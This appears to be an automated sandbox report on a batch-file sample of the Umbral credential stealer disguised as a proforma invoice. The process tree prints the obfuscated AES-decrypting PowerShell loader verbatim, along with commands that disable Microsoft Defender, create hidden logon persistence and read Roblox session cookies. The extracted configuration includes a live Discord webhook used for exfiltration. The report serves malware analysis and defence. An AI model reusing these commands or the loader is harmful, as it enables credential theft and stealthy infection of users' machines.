umbral | e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
24-07-2024 13:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

z1Proforma_invo.bat
Size

232KB
MD5

7ebd033260b1e54dff5afd7c6534cf33
SHA1

cfb7040938237156fa3795755c77eecd7957bc39
SHA256

e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e
SHA512

18175d028e1a0541c3c3f8221173c4e9004a14a4642bf34c6cb7ec660facb74f5c91e5ee8d8677d833cc5fe6d067ea6cb40e641524d909056b8daedc21d2682f
SSDEEP

6144:FAWrhrgGAavaCnw8PaaEnyLzdyWEklez+3PDUi4WQZ5q:KWr5Mt+wezdTeK3LUi1QZM

Score

10^/10

umbral credential_access execution stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1263026563675455508/40rqdx690bYgnTu5DlgourQDtU8ZayQ2_Y8DutOY8G3wIW-x3nALBQHeaH44QkXBTtII

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral2/memory/2928-113-0x000001CB40540000-0x000001CB40580000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 3 IoCs

flow	pid	Process
20	2928	powershell.exe
23	2928	powershell.exe
29	2928	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4964	powershell.exe
4164	powershell.exe
216	powershell.exe
1432	powershell.exe
1316	powershell.exe
3248	powershell.exe
824	powershell.exe
440	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
28	discord.com
29	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	ip-api.com

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2092	wmic.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

pid	Process
5004	powershell.exe
5004	powershell.exe
1432	powershell.exe
1432	powershell.exe
712	powershell.exe
712	powershell.exe
1316	powershell.exe
1316	powershell.exe
2928	powershell.exe
2928	powershell.exe
2928	powershell.exe
3248	powershell.exe
3248	powershell.exe
3248	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
824	powershell.exe
824	powershell.exe
824	powershell.exe
440	powershell.exe
440	powershell.exe
440	powershell.exe
4964	powershell.exe
4964	powershell.exe
4964	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
3016	powershell.exe
3016	powershell.exe
3016	powershell.exe
216	powershell.exe
216	powershell.exe
216	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	1432	powershell.exe
Token: SeDebugPrivilege	712	powershell.exe
Token: SeIncreaseQuotaPrivilege	712	powershell.exe
Token: SeSecurityPrivilege	712	powershell.exe
Token: SeTakeOwnershipPrivilege	712	powershell.exe
Token: SeLoadDriverPrivilege	712	powershell.exe
Token: SeSystemProfilePrivilege	712	powershell.exe
Token: SeSystemtimePrivilege	712	powershell.exe
Token: SeProfSingleProcessPrivilege	712	powershell.exe
Token: SeIncBasePriorityPrivilege	712	powershell.exe
Token: SeCreatePagefilePrivilege	712	powershell.exe
Token: SeBackupPrivilege	712	powershell.exe
Token: SeRestorePrivilege	712	powershell.exe
Token: SeShutdownPrivilege	712	powershell.exe
Token: SeDebugPrivilege	712	powershell.exe
Token: SeSystemEnvironmentPrivilege	712	powershell.exe
Token: SeRemoteShutdownPrivilege	712	powershell.exe
Token: SeUndockPrivilege	712	powershell.exe
Token: SeManageVolumePrivilege	712	powershell.exe
Token: 33	712	powershell.exe
Token: 34	712	powershell.exe
Token: 35	712	powershell.exe
Token: 36	712	powershell.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeIncreaseQuotaPrivilege	1316	powershell.exe
Token: SeSecurityPrivilege	1316	powershell.exe
Token: SeTakeOwnershipPrivilege	1316	powershell.exe
Token: SeLoadDriverPrivilege	1316	powershell.exe
Token: SeSystemProfilePrivilege	1316	powershell.exe
Token: SeSystemtimePrivilege	1316	powershell.exe
Token: SeProfSingleProcessPrivilege	1316	powershell.exe
Token: SeIncBasePriorityPrivilege	1316	powershell.exe
Token: SeCreatePagefilePrivilege	1316	powershell.exe
Token: SeBackupPrivilege	1316	powershell.exe
Token: SeRestorePrivilege	1316	powershell.exe
Token: SeShutdownPrivilege	1316	powershell.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeSystemEnvironmentPrivilege	1316	powershell.exe
Token: SeRemoteShutdownPrivilege	1316	powershell.exe
Token: SeUndockPrivilege	1316	powershell.exe
Token: SeManageVolumePrivilege	1316	powershell.exe
Token: 33	1316	powershell.exe
Token: 34	1316	powershell.exe
Token: 35	1316	powershell.exe
Token: 36	1316	powershell.exe
Token: SeIncreaseQuotaPrivilege	1316	powershell.exe
Token: SeSecurityPrivilege	1316	powershell.exe
Token: SeTakeOwnershipPrivilege	1316	powershell.exe
Token: SeLoadDriverPrivilege	1316	powershell.exe
Token: SeSystemProfilePrivilege	1316	powershell.exe
Token: SeSystemtimePrivilege	1316	powershell.exe
Token: SeProfSingleProcessPrivilege	1316	powershell.exe
Token: SeIncBasePriorityPrivilege	1316	powershell.exe
Token: SeCreatePagefilePrivilege	1316	powershell.exe
Token: SeBackupPrivilege	1316	powershell.exe
Token: SeRestorePrivilege	1316	powershell.exe
Token: SeShutdownPrivilege	1316	powershell.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeSystemEnvironmentPrivilege	1316	powershell.exe
Token: SeRemoteShutdownPrivilege	1316	powershell.exe
Token: SeUndockPrivilege	1316	powershell.exe
Token: SeManageVolumePrivilege	1316	powershell.exe
Token: 33	1316	powershell.exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 2556 wrote to memory of 4924	2556	cmd.exe	85
PID 2556 wrote to memory of 4924	2556	cmd.exe	85
PID 4924 wrote to memory of 3388	4924	cmd.exe	87
PID 4924 wrote to memory of 3388	4924	cmd.exe	87
PID 4924 wrote to memory of 5004	4924	cmd.exe	88
PID 4924 wrote to memory of 5004	4924	cmd.exe	88
PID 5004 wrote to memory of 1432	5004	powershell.exe	92
PID 5004 wrote to memory of 1432	5004	powershell.exe	92
PID 5004 wrote to memory of 712	5004	powershell.exe	96
PID 5004 wrote to memory of 712	5004	powershell.exe	96
PID 5004 wrote to memory of 1316	5004	powershell.exe	99
PID 5004 wrote to memory of 1316	5004	powershell.exe	99
PID 5004 wrote to memory of 3840	5004	powershell.exe	102
PID 5004 wrote to memory of 3840	5004	powershell.exe	102
PID 3840 wrote to memory of 680	3840	cmd.exe	104
PID 3840 wrote to memory of 680	3840	cmd.exe	104
PID 680 wrote to memory of 5016	680	cmd.exe	106
PID 680 wrote to memory of 5016	680	cmd.exe	106
PID 680 wrote to memory of 2928	680	cmd.exe	107
PID 680 wrote to memory of 2928	680	cmd.exe	107
PID 2928 wrote to memory of 3248	2928	powershell.exe	108
PID 2928 wrote to memory of 3248	2928	powershell.exe	108
PID 2928 wrote to memory of 4608	2928	powershell.exe	109
PID 2928 wrote to memory of 4608	2928	powershell.exe	109
PID 2928 wrote to memory of 824	2928	powershell.exe	112
PID 2928 wrote to memory of 824	2928	powershell.exe	112
PID 2928 wrote to memory of 440	2928	powershell.exe	114
PID 2928 wrote to memory of 440	2928	powershell.exe	114
PID 2928 wrote to memory of 4964	2928	powershell.exe	116
PID 2928 wrote to memory of 4964	2928	powershell.exe	116
PID 2928 wrote to memory of 4164	2928	powershell.exe	118
PID 2928 wrote to memory of 4164	2928	powershell.exe	118
PID 2928 wrote to memory of 3016	2928	powershell.exe	120
PID 2928 wrote to memory of 3016	2928	powershell.exe	120
PID 2928 wrote to memory of 4956	2928	powershell.exe	124
PID 2928 wrote to memory of 4956	2928	powershell.exe	124
PID 2928 wrote to memory of 3504	2928	powershell.exe	126
PID 2928 wrote to memory of 3504	2928	powershell.exe	126
PID 2928 wrote to memory of 1664	2928	powershell.exe	128
PID 2928 wrote to memory of 1664	2928	powershell.exe	128
PID 2928 wrote to memory of 216	2928	powershell.exe	130
PID 2928 wrote to memory of 216	2928	powershell.exe	130
PID 2928 wrote to memory of 2092	2928	powershell.exe	132
PID 2928 wrote to memory of 2092	2928	powershell.exe	132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\z1Proforma_invo.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\z1Proforma_invo.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\z1Proforma_invo.bat';$sYtF='EletEUVmetEUVnttEUVAtEUVttEUV'.Replace('tEUV', ''),'LoaSBYldSBYl'.Replace('SBYl', ''),'FrogfmnmBagfmnsgfmnegfmn64gfmnStgfmnrgfmninggfmn'.Replace('gfmn', ''),'MAiuvainAiuvMoAiuvdAiuvuAiuvleAiuv'.Replace('Aiuv', ''),'CnzHHopnzHHyTonzHH'.Replace('nzHH', ''),'TJVfkranJVfksfJVfkormJVfkFinJVfkaJVfklBJVfkloJVfkcJVfkkJVfk'.Replace('JVfk', ''),'InBujdvBujdoBujdkBujdeBujd'.Replace('Bujd', ''),'EuLNintuLNiryuLNiPuLNiouLNiiuLNintuLNi'.Replace('uLNi', ''),'GetQcPVCQcPVurQcPVrenQcPVtPQcPVrocQcPVesQcPVsQcPV'.Replace('QcPV', ''),'RefRLNadfRLNLifRLNnfRLNesfRLN'.Replace('fRLN', ''),'SmNIEplimNIEtmNIE'.Replace('mNIE', ''),'DedEEtcodEEtmdEEtprdEEtesdEEtsdEEt'.Replace('dEEt', ''),'ChadhQhndhQhgedhQhExdhQhtendhQhsidhQhondhQh'.Replace('dhQh', ''),'CvNhjreavNhjtevNhjDecvNhjryvNhjptvNhjovNhjrvNhj'.Replace('vNhj', '');powershell -w hidden;function rfZro($qxWYn){$tAnYl=[System.Security.Cryptography.Aes]::Create();$tAnYl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tAnYl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tAnYl.Key=[System.Convert]::($sYtF[2])('MqczF3Q/W2LU3CGZkY9zS+i5Q+bJVdWYQB5O4eBge5k=');$tAnYl.IV=[System.Convert]::($sYtF[2])('m1KVoTztYUoOwoqZpe9JdA==');$dHynp=$tAnYl.($sYtF[13])();$mirwI=$dHynp.($sYtF[5])($qxWYn,0,$qxWYn.Length);$dHynp.Dispose();$tAnYl.Dispose();$mirwI;}function SfByD($qxWYn){$fdQfc=New-Object System.IO.MemoryStream(,$qxWYn);$KNfPz=New-Object System.IO.MemoryStream;$tnctE=New-Object System.IO.Compression.GZipStream($fdQfc,[IO.Compression.CompressionMode]::($sYtF[11]));$tnctE.($sYtF[4])($KNfPz);$tnctE.Dispose();$fdQfc.Dispose();$KNfPz.Dispose();$KNfPz.ToArray();}$dzSzW=[System.IO.File]::($sYtF[9])([Console]::Title);$twvSq=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 5).Substring(2))));$xLxfI=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 6).Substring(2))));[System.Reflection.Assembly]::($sYtF[1])([byte[]]$xLxfI).($sYtF[7]).($sYtF[6])($null,$null);[System.Reflection.Assembly]::($sYtF[1])([byte[]]$twvSq).($sYtF[7]).($sYtF[6])($null,$null); "
    3⤵
    PID:3388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\z1Proforma_invo')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 26684' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1316
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\SC3.cmd"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3840
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\SC3.cmd"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:680
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\SC3.cmd';$sYtF='EletEUVmetEUVnttEUVAtEUVttEUV'.Replace('tEUV', ''),'LoaSBYldSBYl'.Replace('SBYl', ''),'FrogfmnmBagfmnsgfmnegfmn64gfmnStgfmnrgfmninggfmn'.Replace('gfmn', ''),'MAiuvainAiuvMoAiuvdAiuvuAiuvleAiuv'.Replace('Aiuv', ''),'CnzHHopnzHHyTonzHH'.Replace('nzHH', ''),'TJVfkranJVfksfJVfkormJVfkFinJVfkaJVfklBJVfkloJVfkcJVfkkJVfk'.Replace('JVfk', ''),'InBujdvBujdoBujdkBujdeBujd'.Replace('Bujd', ''),'EuLNintuLNiryuLNiPuLNiouLNiiuLNintuLNi'.Replace('uLNi', ''),'GetQcPVCQcPVurQcPVrenQcPVtPQcPVrocQcPVesQcPVsQcPV'.Replace('QcPV', ''),'RefRLNadfRLNLifRLNnfRLNesfRLN'.Replace('fRLN', ''),'SmNIEplimNIEtmNIE'.Replace('mNIE', ''),'DedEEtcodEEtmdEEtprdEEtesdEEtsdEEt'.Replace('dEEt', ''),'ChadhQhndhQhgedhQhExdhQhtendhQhsidhQhondhQh'.Replace('dhQh', ''),'CvNhjreavNhjtevNhjDecvNhjryvNhjptvNhjovNhjrvNhj'.Replace('vNhj', '');powershell -w hidden;function rfZro($qxWYn){$tAnYl=[System.Security.Cryptography.Aes]::Create();$tAnYl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tAnYl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tAnYl.Key=[System.Convert]::($sYtF[2])('MqczF3Q/W2LU3CGZkY9zS+i5Q+bJVdWYQB5O4eBge5k=');$tAnYl.IV=[System.Convert]::($sYtF[2])('m1KVoTztYUoOwoqZpe9JdA==');$dHynp=$tAnYl.($sYtF[13])();$mirwI=$dHynp.($sYtF[5])($qxWYn,0,$qxWYn.Length);$dHynp.Dispose();$tAnYl.Dispose();$mirwI;}function SfByD($qxWYn){$fdQfc=New-Object System.IO.MemoryStream(,$qxWYn);$KNfPz=New-Object System.IO.MemoryStream;$tnctE=New-Object System.IO.Compression.GZipStream($fdQfc,[IO.Compression.CompressionMode]::($sYtF[11]));$tnctE.($sYtF[4])($KNfPz);$tnctE.Dispose();$fdQfc.Dispose();$KNfPz.Dispose();$KNfPz.ToArray();}$dzSzW=[System.IO.File]::($sYtF[9])([Console]::Title);$twvSq=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 5).Substring(2))));$xLxfI=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 6).Substring(2))));[System.Reflection.Assembly]::($sYtF[1])([byte[]]$xLxfI).($sYtF[7]).($sYtF[6])($null,$null);[System.Reflection.Assembly]::($sYtF[1])([byte[]]$twvSq).($sYtF[7]).($sYtF[6])($null,$null); "
        6⤵
        
        PID:5016
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        6⤵
        Blocklisted process makes network request
        Drops file in Drivers directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\SC3')
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 26684' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3016
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        
        PID:4956
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        
        PID:3504
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:1664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:216
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:2092

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
3KB

MD5
3de0bf504415c5164dee1d6cbe1e920e

SHA1
53684b0b2e1e27a41c4fdd43d67deaf488fb53ee

SHA256
66d8900cd4b1a8add6aafdd940f819b79424306a186bcec020ada984354f28d4

SHA512
71f749fd53ca15f20ca826a2b293c2df15c38a264bc9e27eef22e308b3cceaae44488b153c1cd52f6f10ad2ae48a09ac6183c0f00f4941e6551a128d761327ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
97748f71ed95026706014e8524266292

SHA1
f60663ea2e2a778c57d07d9678fe04c79c3ff942

SHA256
f1320df712bf0d218f62a481ea318abfaba12a6465f9d2e07a6ead9d9bd28d9f

SHA512
b6df8e3eea09cdd6964bb7801a615df38a3043a2961176ec275fef531a8378fd0d21ee96d01165d192b32d0eddc021ad82fa609ab216005a60bf42b79e1e86c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
102deca1fb014c0bd54bb6975a08175b

SHA1
0912e182292abec5911835b6e1cf561f90505f69

SHA256
1bbc5cea1a1d0c123177b28792e70a2c1a6e751f60801cec94bf556acd12703b

SHA512
c495d1f63790115fe3248f8610d7763e01706dd3261908b44e6cba65b60a788647cf411b0ab4631315fc30eef1e6e462293d5415e9e5d3cca920d58f10fa6ed2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
74a6b79d36b4aae8b027a218bc6e1af7

SHA1
0350e46c1df6934903c4820a00b0bc4721779e5f

SHA256
60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04

SHA512
60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d3235ed022a42ec4338123ab87144afa

SHA1
5058608bc0deb720a585a2304a8f7cf63a50a315

SHA256
10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

SHA512
236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
08e2b6dc039d66a6bfa02fbaa9b86e1f

SHA1
1a45a88b900fc97183e50e3dd95deb5c086e2ca7

SHA256
13f0b2febb094f7d558d4325d06807162326f65290c90fa52fa1d3e4e4b35b14

SHA512
2e818787d6067890ec8586f9e4c2d459632e09c167749ff1b58fcaa273850b0ca61f0a468eda65a71358daa36a69ec7961b07cffe6ebcd7b8f79b2b796402891

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4573fa3bad96737dcd87926861e6ed38

SHA1
f58401ad8625eca250b485bcae1275050c300e8d

SHA256
ece35f0338f0c4f9b1a3a911b5bd6ad1ae7e9918464365064636f9000b7efeaa

SHA512
3a443d43c2a6afb129881284ce5feba19e9d5a02aa1ba0873281c51398b0fe856556b5c1351ead6807a6c65690b004310d640c438290be500c839024db1878cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7b417ed6e663604bd1eddfda9a3d4c63

SHA1
6094d58ea8026f589d58d80f222db8981a422f78

SHA256
307c1ac075def49e873521c9389f652dd67a4d468bb24e022bbbdbb802e6441b

SHA512
1ab48686acdd5e8bfa85ee984a83cea627f5527400b4872c28f00ffb16f58e46ff01431de0341e960d5ec8cfa4d96c738bb57cfd9eb4ba23e2773a47f4d385b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d3bsqx4o.vbt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\SC3.cmd

Filesize
232KB

MD5
7ebd033260b1e54dff5afd7c6534cf33

SHA1
cfb7040938237156fa3795755c77eecd7957bc39

SHA256
e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e

SHA512
18175d028e1a0541c3c3f8221173c4e9004a14a4642bf34c6cb7ec660facb74f5c91e5ee8d8677d833cc5fe6d067ea6cb40e641524d909056b8daedc21d2682f

Download Submit
memory/216-193-0x000001BEAA610000-0x000001BEAA82C000-memory.dmp

Filesize
2.1MB

Download
memory/440-125-0x0000023D6BA80000-0x0000023D6BC9C000-memory.dmp

Filesize
2.1MB

Download
memory/712-46-0x0000029DD5AB0000-0x0000029DD5CCC000-memory.dmp

Filesize
2.1MB

Download
memory/824-112-0x000001C4F7B50000-0x000001C4F7D6C000-memory.dmp

Filesize
2.1MB

Download
memory/1316-58-0x0000026FCA300000-0x0000026FCA51C000-memory.dmp

Filesize
2.1MB

Download
memory/1432-22-0x00007FF866E20000-0x00007FF8678E1000-memory.dmp

Filesize
10.8MB

Download
memory/1432-30-0x00007FF866E20000-0x00007FF8678E1000-memory.dmp

Filesize
10.8MB

Download
memory/1432-15-0x00007FF866E20000-0x00007FF8678E1000-memory.dmp

Filesize
10.8MB

Download
memory/1432-16-0x00007FF866E20000-0x00007FF8678E1000-memory.dmp

Filesize
10.8MB

Download
memory/1432-29-0x00000244FBC40000-0x00000244FBE5C000-memory.dmp

Filesize
2.1MB

Download
memory/2928-84-0x000001CB3FDF0000-0x000001CB3FE02000-memory.dmp

Filesize
72KB

Download
memory/2928-85-0x00007FF884FF0000-0x00007FF8851E5000-memory.dmp

Filesize
2.0MB

Download
memory/2928-86-0x00007FF8831F0000-0x00007FF8832AE000-memory.dmp

Filesize
760KB

Download
memory/2928-140-0x000001CB40680000-0x000001CB4069E000-memory.dmp

Filesize
120KB

